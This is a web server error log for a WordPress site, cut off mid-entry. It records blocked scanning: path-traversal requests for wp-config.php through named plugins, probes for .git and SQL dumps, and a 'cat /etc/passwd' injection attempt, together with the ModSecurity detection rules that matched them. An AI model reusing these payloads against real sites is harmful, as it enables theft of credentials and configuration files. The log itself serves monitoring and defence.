trAvis - MANAGER
Edit File: investigacionperu.com.error.log
2022/07/10 03:41:29 [error] 16775#16775: *929 access forbidden by rule, client: 164.92.240.121, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2022/07/10 03:41:30 [error] 16776#16776: *973 access forbidden by rule, client: 45.79.72.76, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2022/07/10 03:41:30 [error] 16775#16775: *1035 access forbidden by rule, client: 68.183.75.40, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Sun Jul 10 08:39:00.818495 2022] [autoindex:error] [pid 1129:tid 140327738349312] [client 194.87.84.195:38420] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2022/07/10 14:55:22 [error] 1722#1722: *3293 access forbidden by rule, client: 3.120.193.160, server: investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "investigacionperu.com" [Mon Jul 11 07:19:30.399752 2022] [autoindex:error] [pid 5906:tid 140120718964480] [client 116.202.173.21:56348] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://investigacionperu.com/wp-content/uploads/index.php [Mon Jul 11 07:19:37.096245 2022] [autoindex:error] [pid 5906:tid 140120702179072] [client 116.202.173.21:56364] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://investigacionperu.com/.well-known/index.php [Mon Jul 11 15:44:51.640587 2022] [autoindex:error] [pid 25097:tid 140120598497024] [client 194.87.84.7:47488] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Jul 11 19:18:03.489340 2022] [autoindex:error] [pid 24880:tid 140120573318912] [client 37.0.11.64:53512] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Jul 12 01:14:59.901603 2022] [:error] [pid 25097:tid 140120489391872] [client 20.94.76.10:58594] [client 20.94.76.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:l. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-plain.php"] [unique_id "Ys0RYzSbstnU7WrI1CV5vgAAANc"], referer: www.google.com [Tue Jul 12 02:29:32.621718 2022] [autoindex:error] [pid 24879:tid 140120606889728] [client 194.87.84.46:59930] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Jul 12 03:08:35.019164 2022] [autoindex:error] [pid 24879:tid 140120531355392] [client 205.134.252.150:60594] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://investigacionperu.com/wp-content/uploads/index.php [Tue Jul 12 03:08:45.537201 2022] [autoindex:error] [pid 25097:tid 140120539748096] [client 205.134.252.150:60616] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://investigacionperu.com/.well-known/index.php [Tue Jul 12 09:08:14.333334 2022] [:error] [pid 10725:tid 140082447025920] [client 195.200.221.228:49624] [client 195.200.221.228] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-admin/admin-post.php?alg_wc_pif_download_file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-post.php"] [unique_id "Ys2ATkqyKjJUZNz3ojo0bQAAAJg"] [Tue Jul 12 09:45:30.155000 2022] [:error] [pid 11289:tid 140082631665408] [client 94.26.228.136:53306] [client 94.26.228.136] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:p1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:p1: system(cat/etc/passwd) "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/webgility/xmlrpc.php"] [unique_id "Ys2JCu15vn7fhcDKKeSw5wAAAMI"] [Tue Jul 12 16:36:36.188464 2022] [:error] [pid 6502:tid 139883217659648] [client 193.201.9.12:52606] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/s_ne.php"] [unique_id "Ys3pZM9l8ei6MoKl3_jEMQAAAEw"] [Tue Jul 12 16:36:45.306514 2022] [:error] [pid 6502:tid 139883226052352] [client 193.201.9.12:52614] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/s_ne.php"] [unique_id "Ys3pbc9l8ei6MoKl3_jEMgAAAEs"] [Tue Jul 12 16:36:53.088513 2022] [:error] [pid 6620:tid 139883192481536] [client 193.201.9.12:52624] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/s_ne.php"] [unique_id "Ys3pdQKfiEdFjo6ZhKjZGAAAAM8"] 2022/07/12 18:39:33 [error] 15097#15097: *4267 access forbidden by rule, client: 141.255.164.186, server: webmail.investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "webmail.investigacionperu.com" [Tue Jul 12 22:30:27.158702 2022] [autoindex:error] [pid 6503:tid 139883343410944] [client 20.90.85.241:33368] AH01276: Cannot serve directory /home/investig/public_html/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Jul 13 02:32:14.825168 2022] [autoindex:error] [pid 6503:tid 139883234445056] [client 45.141.239.144:38800] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jul 14 03:31:43.594987 2022] [autoindex:error] [pid 28955:tid 140374026647296] [client 5.161.116.191:54462] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Jul 14 11:00:35.630539 2022] [autoindex:error] [pid 17614:tid 139659703146240] [client 20.150.150.251:33132] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jul 14 19:32:46.325007 2022] [autoindex:error] [pid 10875:tid 139659951245056] [client 23.88.70.58:43486] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jul 14 19:32:50.871789 2022] [autoindex:error] [pid 10875:tid 139659736717056] [client 23.88.70.58:43488] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jul 14 19:38:29.345989 2022] [autoindex:error] [pid 10875:tid 139659778680576] [client 23.88.70.58:43608] AH01276: Cannot serve directory /home/investig/public_html/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jul 14 19:44:35.900001 2022] [autoindex:error] [pid 10683:tid 139659854214912] [client 85.202.169.213:43756] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jul 14 21:32:58.136340 2022] [autoindex:error] [pid 10683:tid 139659686360832] [client 51.142.115.168:45716] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Jul 15 08:03:50.919163 2022] [autoindex:error] [pid 21135:tid 139876011833088] [client 95.217.200.94:57810] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jul 15 08:03:55.871457 2022] [autoindex:error] [pid 21686:tid 139875919513344] [client 95.217.200.94:57814] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jul 15 08:16:32.137739 2022] [autoindex:error] [pid 21686:tid 139875986654976] [client 95.217.200.94:58028] AH01276: Cannot serve directory /home/investig/public_html/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jul 15 21:21:33.662498 2022] [autoindex:error] [pid 28361:tid 140071684495104] [client 20.90.85.241:49108] AH01276: Cannot serve directory /home/investig/public_html/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jul 16 12:32:44.794772 2022] [:error] [pid 18234:tid 140637319931648] [client 2.58.149.35:42044] [client 2.58.149.35] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "YtL2PAtiwB_bpyoZ5LGrDQAAANA"] [Sat Jul 16 12:32:44.913280 2022] [:error] [pid 17712:tid 140637521995520] [client 2.58.149.35:42048] [client 2.58.149.35] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-admin/admin-ajax.php?action=handle_downloads&alg_wc_pif_download_file=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "YtL2PKDmDRH_xYKs5-HkhAAAAIA"] [Sat Jul 16 12:32:45.063373 2022] [:error] [pid 17712:tid 140637420644096] [client 2.58.149.35:42050] [client 2.58.149.35] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php"] [unique_id "YtL2PaDmDRH_xYKs5-HkhQAAAIQ"] [Sat Jul 16 12:32:45.074331 2022] [:error] [pid 17711:tid 140637378680576] [client 2.58.149.35:42052] [client 2.58.149.35] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=../../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php"] [unique_id "YtL2PblgDjaIhDZ48-9hKgAAAEk"] [Sat Jul 16 12:32:45.122146 2022] [:error] [pid 18234:tid 140637336717056] [client 2.58.149.35:42054] [client 2.58.149.35] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/post-pdf-export/dompdf/dompdf.php"] [unique_id "YtL2PQtiwB_bpyoZ5LGrDgAAAM4"] 2022/07/16 13:42:13 [error] 17576#17576: *75356 access forbidden by rule, client: 179.43.191.250, server: investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "www.investigacionperu.com" [Sat Jul 16 16:58:57.319332 2022] [:error] [pid 18234:tid 140637370287872] [client 185.112.83.251:46834] [client 185.112.83.251] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/dump.sql"] [unique_id "YtM0oQtiwB_bpyoZ5LGs4wAAAMo"] [Sat Jul 16 16:58:58.503274 2022] [:error] [pid 17710:tid 140637269575424] [client 185.112.83.251:46836] [client 185.112.83.251] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/backup.sql"] [unique_id "YtM0oh_hVSsPJ4M3QlW8gQAAABY"] [Sun Jul 17 20:44:19.951541 2022] [:error] [pid 23213:tid 139778964023040] [client 20.11.48.43:52802] [client 20.11.48.43] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "YtS685vAUk9ZfhiEfBMmlwAAAA4"] [Sun Jul 17 20:44:19.959617 2022] [:error] [pid 23967:tid 139779142211328] 